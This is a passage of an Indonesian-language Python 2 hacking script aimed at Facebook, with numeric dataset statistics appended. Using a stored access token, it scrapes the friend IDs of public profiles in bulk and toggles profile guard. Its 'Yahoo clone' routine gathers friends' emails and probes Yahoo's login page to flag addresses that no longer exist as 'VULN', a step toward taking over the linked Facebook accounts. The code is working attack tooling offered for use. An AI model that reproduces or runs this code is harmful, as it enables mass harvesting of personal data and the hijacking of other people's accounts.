print"\033[1;91m[!] Gagal membuat file"
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;97m[!] Terhenti !")
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except KeyError:
print('\033[1;91m[!] Gagal !')
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except OSError:
print('\033[1;97m[\033[1;95m!\033[1;97m]\033[1;97m File anda tidak tersimpan !')
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 vip.py")
except requests.exceptions.ConnectionError:
print"\033[1;97m[×] Tidak ada koneksi !"
keluar()
##### ID PUBLIK #####
def idfrom_teman():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idt = raw_input("\033[1;97m[\033[1;95m+\033[1;97m] ID publik/teman : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m[\033[1;95m✓\033[1;97m] \033[1;97mNama : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;95m!\033[1;97m] ID publik/teman tidak ada !"
raw_input("\n\033[1;93m[\033[1;97m Kembali \033[1;93m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(50000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;97m[\033[1;95m•\033[1;97m] \033[1;97mMengambil Semua Id ...')
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"),;sys.stdout.flush();time.sleep(0.0050)
print '\033[1;93m ' + a['id']
bz.close()
print '\r\033[1;97m[\033[1;95m✓\033[1;97m] \033[1;97mSukses Mengambil Id \033[1;97m....'
print"\r\033[1;97m[\033[1;95m•\033[1;97m] Total ID : %s"%(len(idfromteman))
done = raw_input("\r\033[1;97m[\033[1;95m+\033[1;97m] \033[1;97mSimpan nama file : ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[\033[1;95m√\033[1;97m] File tersimpan : out/"+done)
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except OSError:
print"\033[1;97m[!] File Tidak Tersimpan "
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 vip.py")
except IOError:
print"\033[1;97m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
os.system("python2 vip.py")
except (KeyboardInterrupt,EOFError):
print("\033[1;97m[!] Terhenti")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;97m[\033[1;95m!\033[1;97m] Teman tidak ada !')
raw_input("\n\033[1;93m[\033[1;97m Kembali \033[1;93m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;97m[\033[1;91m✖\033[1;97m] Tidak ada koneksi !"
keluar()
##### PROFIL GUARD #####
def guard():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;90m01\033[1;97m]\033[1;96m->\033[1;97m Aktifkan profile guard"
print "\033[1;97m[\033[1;90m02\033[1;97m]\033[1;96m->\033[1;97m Nonaktifkan profile guard"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
guard_pilih()
def guard_pilih():
guar = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if guar =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
guard_pilih()
elif guar =="1" or guar =="01":
aktif = "true"
gaz(toket, aktif)
elif guar =="2" or guar =="02":
non = "false"
gaz(toket, non)
elif guar =="0" or guar =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
guard_pilih()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print"\033[97m[\033[92m✓\033[97m]\033[92m Sukses Mengaktifkan ..."
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
menu()
elif '"is_shielded":false' in res.text:
os.system('clear')
print logo
print"\033[97m[\033[91m✓\033[97m]\033[91m Sukses Menonaktifkan ..."
raw_input("\n\033[1;93m[\033[1;97m Kembali \033[1;93m]")
menu()
else:
print "\033[91m[!] Error"
keluar()
##### YAHOO CLONE #####
def menu_yahoo():
global toket
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system("clear")
print logo
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print "\033[1;97m[\033[1;92m01\033[1;97m]\033[1;96m->\033[1;97m Clone dari daftar teman"
print "\033[1;97m[\033[1;92m02\033[1;97m]\033[1;96m->\033[1;97m Clone dari publik/teman"
print "\033[1;97m[\033[1;91m00\033[1;97m]\033[1;96m->\033[1;97m Kembali"
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
yahoo_pilih()
#### PILIH YAHOO ####
def yahoo_pilih():
go = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if go =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
yahoo_pilih()
elif go =="1" or go =="01":
yahoofriends()
elif go =="2" or go =="02":
yahoofromfriends()
elif go =="0" or go =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
jalan('\033[1;97m[\033[1;92m~\033[1;97m] Mengambil email ...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/mailku.txt','w')
jalan('\033[1;97m[\033[1;92m•\033[1;97m] Mulai clone ...')
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["user.lower()name"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_user.lower()NAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_user.lower()NAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print '\033[1;97m[\033[1;92m✓\033[1;97m] Selesai ...'
print"\033[1;97m[\033[1;92m+\033[1;97m] Total : "+str(len(berhasil))
print"\033[1;97m[\033[1;92m•\033[1;97m] File tersimpan : out/mailku.txt"
save.close()
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 vip.py")
##### CLONE DARI PUBLIK #####
def yahoofromfriends():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError,requests.exceptions.ConnectionError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
idt = raw_input("\033[1;97m[\033[1;92m+\033[1;97m] ID publik/teman : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m[\033[1;92m✓\033[1;97m] Nama : "+op["name"]
except KeyError:
print"\033[1;91m[!] ID publik/teman tidak ada"
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
menu_yahoo()
jalan('\033[1;97m[\033[1;92m~\033[1;97m] Mengambil email ...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/mailteman.txt','w')
jalan('\033[1;97m[\033[1;92m•\033[1;97m] Mulai clone\033[1;97m...')
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["user.lower()name"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_user.lower()NAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_user.lower()NAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print '\033[1;97m[\033[1;92m✓\033[1;97m] Selesai ....'
print"\033[1;97m[\033[1;92m•\033[1;97m] Total : "+str(len(berhasil))
print"\033[1;97m[\033[1;92m!\033[1;97m] File tersimpan : out/mailteman.txt"
save.close()
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 vip.py")
#######SAYA########
def saya():
os.system ('clear')
print logo
jalan (' \033[92mAnda Akan Di Arahkan Ke Browser')
os.system('xdg-open https://m.facebook.com/Rizky.Rasata')
menu()
if __name__=='__main__':
menu()
masuk()
| 42.133236 | 425 | 0.574765 | 8,444 | 57,554 | 3.909048 | 0.069398 | 0.101672 | 0.075285 | 0.067256 | 0.798837 | 0.781386 | 0.748637 | 0.722613 | 0.691196 | 0.672261 | 0 | 0.15507 | 0.187215 | 57,554 | 1,365 | 426 | 42.164103 | 0.543877 | 0.005577 | 0 | 0.587041 | 0 | 0.159251 | 0.500414 | 0.220513 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.076503 | 0.007806 | null | null | 0.21936 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.